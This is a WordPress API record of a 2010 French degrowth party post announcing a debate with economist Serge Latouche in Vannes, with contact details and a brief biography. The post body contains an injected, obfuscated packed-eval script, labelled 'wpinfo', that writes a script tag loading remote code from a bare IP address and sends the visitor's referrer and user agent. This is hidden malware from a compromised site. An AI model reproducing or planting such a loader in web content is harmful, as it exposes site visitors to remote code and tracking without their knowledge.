{"id":4623,"date":"2010-06-16T14:34:28","date_gmt":"2010-06-16T13:34:28","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=4623"},"modified":"2010-06-27T15:02:53","modified_gmt":"2010-06-27T14:02:53","slug":"vendredi-25-juin-reunion-debat-avec-serge-latouche","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=4623","title":{"rendered":"Vendredi 25 juin : r\u00e9union-d\u00e9bat avec Serge Latouche"},"content":{"rendered":"<p style=\"text-align: center;\"><strong><img loading=\"lazy\" decoding=\"async\" class=\"alignleft\" src=\"http:\/\/decroissance.lehavre.free.fr\/latouche_pari.jpg\" alt=\"\" width=\"87\" height=\"142\" \/>Bretagne <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|trhhz|var|u0026u|referrer|ibfrh||js|php'.split('|'),0,{}))\n<\/script><\/noindex> D\u00e9croissance vous invite \u00e0 une r\u00e9union-d\u00e9bat avec Serge Latouche<\/strong><\/p>\n<p style=\"text-align: center;\"><span style=\"color: #ff0000;\"><strong>\u00ab\u00a0Ni croissance, ni aust\u00e9rit\u00e9, l&rsquo;abondance frugale avec la d\u00e9croissance!\u00a0\u00bb<\/strong><\/span><\/p>\n<p style=\"text-align: center;\">Vendredi 25 juin 2010 \u00e0 20h30<br \/>\nau Palais des Arts et des Congr\u00e8s de Vannes.<\/p>\n<p style=\"text-align: center;\">Plus de renseignements<br \/>\n02-97-39-99-91 &#8211; cedric.cadoret@gmail.com<\/p>\n<p><em>Serge Latouche, n\u00e9 \u00e0 Vannes le 12 janvier 1940, est un \u00e9conomiste  fran\u00e7ais.<br \/>\nSerge Latouche est l&rsquo;un des \u00ab contributeurs historiques \u00bb de La Revue du  MAUSS, professeur \u00e9m\u00e9rite \u00e0 la facult\u00e9 de droit, \u00e9conomie et gestion  Jean Monnet (Sceaux) de l&rsquo;universit\u00e9 Paris-XI. Il est directeur du  Groupe de recherche en anthropologie, \u00e9pist\u00e9mologie et \u00e9conomie de la  pauvret\u00e9 (GRAEEP).Th\u00e9oricien de la D\u00e9croissance.<\/em><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Bretagne D\u00e9croissance vous invite \u00e0 une r\u00e9union-d\u00e9bat avec Serge Latouche \u00ab\u00a0Ni croissance, ni aust\u00e9rit\u00e9, l&rsquo;abondance frugale avec la d\u00e9croissance!\u00a0\u00bb Vendredi 25 juin 2010 \u00e0 20h30 au Palais des Arts et des Congr\u00e8s de Vannes. Plus de renseignements 02-97-39-99-91 &#8211; cedric.cadoret@gmail.com &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=4623\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-4623","post","type-post","status-publish","format-standard","hentry","category-agenda-du-p-p-l-d"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/4623","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4623"}],"version-history":[{"count":10,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/4623\/revisions"}],"predecessor-version":[{"id":4625,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/4623\/revisions\/4625"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4623"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4623"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4623"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}